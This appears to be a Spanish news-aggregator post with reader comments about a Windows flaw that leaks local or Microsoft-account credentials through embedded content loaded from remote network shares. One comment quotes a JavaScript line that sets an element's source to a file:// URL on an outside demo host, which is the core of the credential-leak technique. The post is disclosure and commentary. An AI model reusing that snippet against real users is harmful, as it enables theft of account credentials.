22 meneos
108 clics
Una vulnerabilidad en windows permite robar tus credenciales de cuenta Microsoft o local [ENG]
Un bug activo desde win 95 a win 10 permite robar las credenciales de usuario local de windows o en su lugar, también la cuenta de Microsoft. Microsoft Edge, Outlook y otros productos de Microsoft permiten conexiones a recursos compartidos de red locales. El problema viene de que por defecto no se impide además, conexiones a recursos compartidos remotos. Un atacante podría aprovecharse mediante una web o correo con una imagen incrustada u otro contenido que se intenta cargar desde un recurso compartido de red, para poder robar las credenciales
|
comentarios cerrados
Gracias por el aviso.
P.D: Demo: msleak.perfect-privacy.com
Salu2
Salu2
Salu2
elem.setAttribute("src","file://msleak.perfect-privacy.com/"+id);
Esto es viejo, quiero decir, muy muy viejo. Del estilo que se sabe desde hace una eternidad, pero si que es cierto lo que dicen, tu password local de maquina podía no ser tan interesante, pero si es la de tu cuenta de outlook.com, entonces si que lo es.
La prueba de concepto es mas fácil de hacer con una pagina web.